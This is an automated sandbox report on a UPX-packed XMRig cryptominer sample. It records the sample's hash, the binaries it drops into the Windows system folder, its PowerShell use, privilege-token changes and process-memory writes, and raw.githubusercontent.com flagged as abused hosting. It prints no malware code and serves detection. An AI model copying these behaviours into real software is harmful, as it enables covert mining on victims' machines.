Malware Analysis Report

2025-04-19 16:10

Sample ID 240522-q4s79ade75
Target 6779e21ada0724037ace4e0da96b8501_JaffaCakes118
SHA256 eef964dc8af017eb3df1f9a018a0880261c4d90832c356bf6a62324791e01727
Tags
xmrig execution miner upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

eef964dc8af017eb3df1f9a018a0880261c4d90832c356bf6a62324791e01727

Threat Level: Known bad

The file 6779e21ada0724037ace4e0da96b8501_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner upx

Xmrig family

xmrig

XMRig Miner payload

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

UPX packed file

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 13:49

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 13:49

Reported

2024-05-22 13:51

Platform

win10v2004-20240426-en

Max time kernel

125s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\IQFfCth.exe N/A
N/A N/A C:\Windows\System\jsGJPoJ.exe N/A
N/A N/A C:\Windows\System\dRthmix.exe N/A
N/A N/A C:\Windows\System\VFePrpe.exe N/A
N/A N/A C:\Windows\System\wsVwhZx.exe N/A
N/A N/A C:\Windows\System\IlXXiFS.exe N/A
N/A N/A C:\Windows\System\UWrullI.exe N/A
N/A N/A C:\Windows\System\yHJffaT.exe N/A
N/A N/A C:\Windows\System\onNIwkp.exe N/A
N/A N/A C:\Windows\System\nLlrHaS.exe N/A
N/A N/A C:\Windows\System\CQeSpfA.exe N/A
N/A N/A C:\Windows\System\LQWCntI.exe N/A
N/A N/A C:\Windows\System\LaBKhzw.exe N/A
N/A N/A C:\Windows\System\ydKZEUK.exe N/A
N/A N/A C:\Windows\System\TVUgmGi.exe N/A
N/A N/A C:\Windows\System\jLuZyni.exe N/A
N/A N/A C:\Windows\System\BHZkard.exe N/A
N/A N/A C:\Windows\System\srKygpS.exe N/A
N/A N/A C:\Windows\System\rYtkDvr.exe N/A
N/A N/A C:\Windows\System\xqNueVZ.exe N/A
N/A N/A C:\Windows\System\uoFQlRv.exe N/A
N/A N/A C:\Windows\System\HMHAgcj.exe N/A
N/A N/A C:\Windows\System\GyZTFQx.exe N/A
N/A N/A C:\Windows\System\QkVyFyb.exe N/A
N/A N/A C:\Windows\System\ycDwHFp.exe N/A
N/A N/A C:\Windows\System\SKObWWE.exe N/A
N/A N/A C:\Windows\System\RsYOGdF.exe N/A
N/A N/A C:\Windows\System\glmuLZG.exe N/A
N/A N/A C:\Windows\System\DSvJLfo.exe N/A
N/A N/A C:\Windows\System\pQBnhmq.exe N/A
N/A N/A C:\Windows\System\LUoxmgL.exe N/A
N/A N/A C:\Windows\System\geEXswD.exe N/A
N/A N/A C:\Windows\System\gxqIXbk.exe N/A
N/A N/A C:\Windows\System\mHJgwgC.exe N/A
N/A N/A C:\Windows\System\lgeqSIa.exe N/A
N/A N/A C:\Windows\System\ScvXigm.exe N/A
N/A N/A C:\Windows\System\kZNzntD.exe N/A
N/A N/A C:\Windows\System\QoHGlYR.exe N/A
N/A N/A C:\Windows\System\xznFXir.exe N/A
N/A N/A C:\Windows\System\kdtEmjx.exe N/A
N/A N/A C:\Windows\System\ZTZAJFH.exe N/A
N/A N/A C:\Windows\System\DtBLSHv.exe N/A
N/A N/A C:\Windows\System\ReeOOlu.exe N/A
N/A N/A C:\Windows\System\leFjYMA.exe N/A
N/A N/A C:\Windows\System\VPXMlkt.exe N/A
N/A N/A C:\Windows\System\GhwdndH.exe N/A
N/A N/A C:\Windows\System\bDwRWIN.exe N/A
N/A N/A C:\Windows\System\txGCBbC.exe N/A
N/A N/A C:\Windows\System\ngcQWFK.exe N/A
N/A N/A C:\Windows\System\udqXNOw.exe N/A
N/A N/A C:\Windows\System\XMkfgGK.exe N/A
N/A N/A C:\Windows\System\tCciNBj.exe N/A
N/A N/A C:\Windows\System\EPwuAGi.exe N/A
N/A N/A C:\Windows\System\jODivET.exe N/A
N/A N/A C:\Windows\System\qPcxKLr.exe N/A
N/A N/A C:\Windows\System\GXCOoej.exe N/A
N/A N/A C:\Windows\System\xMxRYbM.exe N/A
N/A N/A C:\Windows\System\vnLqjoH.exe N/A
N/A N/A C:\Windows\System\OeoYgEa.exe N/A
N/A N/A C:\Windows\System\RMqnZkd.exe N/A
N/A N/A C:\Windows\System\nmllLwd.exe N/A
N/A N/A C:\Windows\System\QexJLhA.exe N/A
N/A N/A C:\Windows\System\JZSlpyC.exe N/A
N/A N/A C:\Windows\System\cFxuvpP.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\aJotVhr.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\TPzgCkS.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\mOIZehH.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\XoHgvoM.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\KrvelaE.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\zIwPVNJ.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\BuFqGIK.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\siyrtHN.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\Asjhrbo.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\DeehaVH.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\LiABZgZ.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\KnTVMHB.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\ICWcdPp.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\wKqJqPk.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\ilsdDBV.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\glmuLZG.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\paJjnUi.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\lgvGUqM.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\VUjQqrL.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\uphbAVa.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\wsVwhZx.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\sslRxlO.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\pbzUigx.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\FDfuajn.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\BkkkAuO.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\kiMoFqH.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\HQzhUfA.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\tPCLodL.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\AqONdCJ.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\ALXtQfi.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\ydKZEUK.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\TgDCjBZ.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\WAcSwvv.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\JrEKRiQ.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\ZzBLTgg.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\kyqPnpJ.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\vwNmlqi.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\XzVlvwp.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\MpiUAMZ.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\KHjhAqu.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\bRYcifD.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\qDGMgVr.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\izDGooX.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\CMZsBSn.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\ljraKLJ.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\gMYShzB.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\VlfAUZO.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\oSnFZCy.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\fhEDISy.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\xsGmZii.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\jLuZyni.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\FWlYMaT.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\EdBMkDl.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\zWLtytV.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\HovOojk.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\FTrkAyV.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\zWlIkXX.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\EQYvUaV.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\YvhihRQ.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\ZvJjREj.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\xKvlIjo.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\ebJIZgl.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\whKzQQF.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
File created C:\Windows\System\Bazaavr.exe C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1280 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1280 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1280 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\IQFfCth.exe
PID 1280 wrote to memory of 3168 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\IQFfCth.exe
PID 1280 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\jsGJPoJ.exe
PID 1280 wrote to memory of 3736 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\jsGJPoJ.exe
PID 1280 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\dRthmix.exe
PID 1280 wrote to memory of 3124 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\dRthmix.exe
PID 1280 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\VFePrpe.exe
PID 1280 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\VFePrpe.exe
PID 1280 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\wsVwhZx.exe
PID 1280 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\wsVwhZx.exe
PID 1280 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\IlXXiFS.exe
PID 1280 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\IlXXiFS.exe
PID 1280 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\UWrullI.exe
PID 1280 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\UWrullI.exe
PID 1280 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\yHJffaT.exe
PID 1280 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\yHJffaT.exe
PID 1280 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\onNIwkp.exe
PID 1280 wrote to memory of 1424 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\onNIwkp.exe
PID 1280 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\nLlrHaS.exe
PID 1280 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\nLlrHaS.exe
PID 1280 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\CQeSpfA.exe
PID 1280 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\CQeSpfA.exe
PID 1280 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\LQWCntI.exe
PID 1280 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\LQWCntI.exe
PID 1280 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\LaBKhzw.exe
PID 1280 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\LaBKhzw.exe
PID 1280 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\ydKZEUK.exe
PID 1280 wrote to memory of 4060 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\ydKZEUK.exe
PID 1280 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\TVUgmGi.exe
PID 1280 wrote to memory of 3536 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\TVUgmGi.exe
PID 1280 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\jLuZyni.exe
PID 1280 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\jLuZyni.exe
PID 1280 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\BHZkard.exe
PID 1280 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\BHZkard.exe
PID 1280 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\srKygpS.exe
PID 1280 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\srKygpS.exe
PID 1280 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\rYtkDvr.exe
PID 1280 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\rYtkDvr.exe
PID 1280 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\xqNueVZ.exe
PID 1280 wrote to memory of 3872 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\xqNueVZ.exe
PID 1280 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\ycDwHFp.exe
PID 1280 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\ycDwHFp.exe
PID 1280 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\uoFQlRv.exe
PID 1280 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\uoFQlRv.exe
PID 1280 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\HMHAgcj.exe
PID 1280 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\HMHAgcj.exe
PID 1280 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\GyZTFQx.exe
PID 1280 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\GyZTFQx.exe
PID 1280 wrote to memory of 4816 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\QkVyFyb.exe
PID 1280 wrote to memory of 4816 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\QkVyFyb.exe
PID 1280 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\SKObWWE.exe
PID 1280 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\SKObWWE.exe
PID 1280 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\RsYOGdF.exe
PID 1280 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\RsYOGdF.exe
PID 1280 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\glmuLZG.exe
PID 1280 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\6779e21ada0724037ace4e0da96b8501_JaffaCakes118.exe C:\Windows\System\glmuLZG.exe
